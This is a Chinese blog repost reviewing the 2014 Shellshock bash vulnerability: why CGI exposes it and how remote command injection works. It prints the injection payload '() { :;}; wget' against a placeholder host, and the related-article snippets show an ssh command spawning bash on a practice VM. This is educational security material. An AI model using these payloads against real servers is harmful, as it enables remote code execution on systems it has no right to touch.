shellshock漏洞回顾

最新推荐文章于 2024-04-15 14:30:00 发布
最新推荐文章于 2024-04-15 14:30:00 发布
阅读量139 收藏
点赞数
文章标签: php shell python
原文链接:http://blog.51cto.com/10509896/2174506
版权

review

  • 定位漏洞缘由
    部分大佬认为uCGI技术的普及是个错误,正是因为CGI技术的不合理之处,Shellshock才有机可乘。
CGI技术是Web技术刚兴起的时候发明的,它是最早的可以创建动态网页内容的技术之一。它会把一个HTTP请求转化为一次shell调用。CGI (Common Gateway Interface),是一种基于浏览器的输入,在Web服务器上运行程序的方法。
  • 风险预估

起初以为这个仅仅是个本地执行的漏洞。后面发现亦可作为远程×××。

远程×××面:正是由于后台处理程序不仅仅可以用PHP、Python、Perl等脚本来接受请求、解释执行、响应客户端,当然还可以用Bash脚本来解释执行用户提交的GET或POST请求。

Bash漏洞其实是非常经典的“注入式×××”,也就是可以向 bash注入一段命令,从bash1.14 到4.3都存在这样的漏洞。

() { :;}; wget http://www.XXX.com/testvul.sh

对于利用Bash脚本处理用户请求的网站,×××者可以精心伪造数据,通过网络传到一台服务器上,直接或间接触发一个bash脚本,这样就可以远程执行恶意代码。

通过特定格式的指令设置环境变量,进而在执行bash脚本时会先执行把我们设置的环境变量执行。

shellshock分析与回顾:
http://www.myhack58.com/Article/html/3/8/2014/54877_13.htm

shellshock真实案列:

http://www.freebuf.com/articles/system/45390.html

×××前提:必须得在有漏洞的机器上执行我们的bash代码。

课程参考:
https://www.shiyanlou.com/courses/230

转载于:https://blog.51cto.com/10509896/2174506

weixin_34001430
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulhub-Shellshock Remote Command Injection (CVE-2014-6271)
ad12456的博客
05-18 444
Shellshock远程命令注入
【安全】Shellshock漏洞
01-30 446
Shellshock利用了linux环境变量解析问题,进而可以进行针对正常应用启动shell时进行劫持。通过该漏洞,可以实现CGI环境下的RCE,以及针对特权应用的提权。 可以简单理解为,当环境变量可控时,均存在攻击场景。如此看来,该漏洞危害极大,攻击场景非常广。
黑客必备!Linux Shell Shock漏洞利用和实战
最新发布
logic1001的博客
04-15 990
漏洞介绍Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。——摘自维基百科环境搭建1、 以root权限安装4.1版本的bansh。下载地址:3、链接5、 如果上一步输出vulnerable,那么让/bin/sh指向/bin/bash。
shellshock_Shellshock Bash漏洞
culin0274的博客
08-11 195
shellshockShellshock is a vulnerability that has been discovered in Bash, which you are likely to know as the command line interface that you use to manage your Linux server through SSH. On a compromi...
LINUX漏洞复现篇之ShellShock漏洞
xf555er的博客
12-06 1007
ShellShock漏洞, 中文称为"破壳漏洞", 是Unix Shell中的安全漏洞在一些网络服务器的部署中, 使用bash来处理某些请求, 允许攻击者通过低版本的bash执行任意Shell命令此漏洞在调用BashShell之前使用payload创建环境变量, 这些环境变量包含Shell代码, 在Shell被调用后代码会被执行bash使用的环境变量是通过函数名称来调用的,以""开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “” 为结束,而是执行其后的恶意shell命令Vul
linux shellshock漏洞,shellshock漏洞分析
weixin_28706923的博客
05-18 302
这是tr0ll2靶机涉及到的东西,先看一下在这个靶机上的过程。我们获取了noob用户的ssh密钥,之后登录却失败了:之后我们输入如下命令:ssh noob@192.168.16.141 -i noob -t '() { :;}; /bin/bash'再次登录,居然成功了:以上就是shellshock攻击,其利用的是bash在导入环境变量函数时候的漏洞,启动bash的时候,它不仅会导入这个函数,也...
shellshock 漏洞 bash漏洞rpm包升级包
09-28
研究人员周四发布警告称 黑客已经开始利用最新的“Shellshock”电脑漏洞 借助蠕虫病毒扫描有漏洞的系统 然后感染这些 redhat 6 5以上版本32 位64位 升级包
shellshock漏洞的redhat最新补丁及说明
10-04
shellshock漏洞的最新redhat补丁及说明,包含redhat rhel5和rhel6两个版本的32和64位系统,请放心下载
Bash漏洞——Shellshock浅析.pdf
07-10
【Bash漏洞——Shellshock浅析】 Bash漏洞,又称Shellshock,是指在2014年被发现的一个严重安全漏洞,它影响了广泛使用的Bash shell,这是一个在Unix-like操作系统,包括Linux和Mac OS X中的命令行解释器。这个漏洞...
shellshock
12-10
shellshock代码,网页形式,看起来不错,需要到可以试试哦。
ShellShockHunter:这是测试漏洞Shellshock的简单工具
05-05
Shellshock,也称为Bashdoor,是Unix Bash shell中的一系列安全漏洞,第一个漏洞已于2014年9月24日公开。Shellshock可能使攻击者导致Bash执行任意命令并获得对许多Internet-使用Bash处理请求的面向服务(例如Web...
漏洞分析——shellshock实验
郭同学如是说
04-15 1693
Shellshock Attack Lab 前导知识 SHELL:命令行界面的解释器 Linux下常见Shell: Bourne Again Shell(/bin/bash) C Shell(/usr/bin/csh) K Shell(/usr/bin/ksh) Bourne Again Shell(/bin/bash) 查看目前使用的shell是否是/bin/bash: seed@ubuntu:/usr/lib/cgi-bin$ echo $SHELL /bin/bash vim编
linux shellshock漏洞,修复linux bash的ShellShock系列漏洞
weixin_34515820的博客
05-18 219
检查是否有linux bash的ShellShock系列漏洞ShellShock系列漏洞包含有CVE-2014-6271CVE-2014-7169CVE-2014-7186CVE-2014-7187CVE-2014-6277CVE-2014-6278检查是否有ShellShock系列漏洞wget --no-check-certificate https://github.com/hannob/...
ShellShock漏洞原理分析
weixin_34037515的博客
05-27 414
9月24日,广泛存在于Linux的bash漏洞曝光。因为此漏洞可以执行远程命令,所以极为危。危害程度可能超过前段时间的心脏流血漏洞漏洞编号CVE-2014-6271,以及打了补丁之后被绕过的CVE-2014-7169,又称ShellShock漏洞漏洞起因: 要是用一句话概括这个漏洞,就是代码和数据没有正确区分。 此次漏洞很像SQL注入,通过特...
CVE-2014-6271-bash shellshock-破壳漏洞复现
m0_62008601的博客
08-06 2921
这些变量可以包含代码,在shell被调用后会被立即执行。用docker搭建vulhub漏洞靶场,服务启动后,有两个页面http://192.168.217.134:8080/victim.cgi和http://192.168.217.134:8080/safe.cgi。可以看到错误原因都是permission denied,那就是权限不足的原因了,那我们就修改一下权限,让它能够被访问。既然在victim.cgi可以执行命令,那么应该就可以进行反弹shell了,kali开启端口监听,执行反弹shell命令。.
shellshock_记住shellshock漏洞
weixin_26636643的博客
08-13 496
shellshockSold) type of OS Command Injection was reported. The Shellshock vulnerability, also known as CVE-2014–6271, allowed attackers to inject their own code into Bash using specially crafted envir...
Shellshock漏洞复现
weixin_44283446的博客
03-23 4814
Shellshock漏洞复现bash说明漏洞原理漏洞复现环境说明漏洞条件漏洞复现 bash说明 Bash是Unix shell的一种。1989年发布第一个正式版本,原先是计划用在GNU操作系统上,但能运行于大多数类Unix系统的操作系统之上。 漏洞原理 目前的Bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题的是以”(){”开头定义的环境变量在命令env中解析成函数后,Bash执行未退出,而是继续解析并执行shell命令,而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的参
shellshock漏洞复现
qq_45570082的博客
04-13 316
复现过程 用别人做好的docker进行复现 docker search shellshock docker pull hmlio/vaas-cve-2014-6271 docker run -it -p 80:80 --name test hmlio/vaas-cve-2014-6271 /bin/bash 进入之后先进行本地测试: root@96803784d9f2:/# test='() {...
学习笔记 | Shellshock漏洞利用提权
m0_57133419的博客
08-10 339
Shellshock漏洞中,攻击者可以通过在环境变量中插入恶意代码,例如函数定义,然后触发Bash解释器执行这些代码。这是因为Bash解释器在解释环境变量时,并不仅仅是将变量的值替换为文本,而是会尝试解释其中的特殊字符和命令。Bash解释器在解释环境变量时,不仅仅是简单地替换变量的值,它还会对变量的内容进行解释,包括其中可能存在的特殊字符和命令。然后,如果有任何触发条件,比如执行后面的命令时,Bash会执行这个恶意函数,并输出语句。借助漏洞利用的脚本直接更改脚本内容,发现不行,我不会改perl语言。
shellshock漏洞利用
04-03
Shellshock漏洞是一个存在于Bash(Unix和Linux操作系统的一种常用Shell)中的安全漏洞,它于2014年被公开。该漏洞允许攻击者通过构造恶意的环境变量来执行任意的命令,从而导致系统被入侵。 Shellshock漏洞的利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值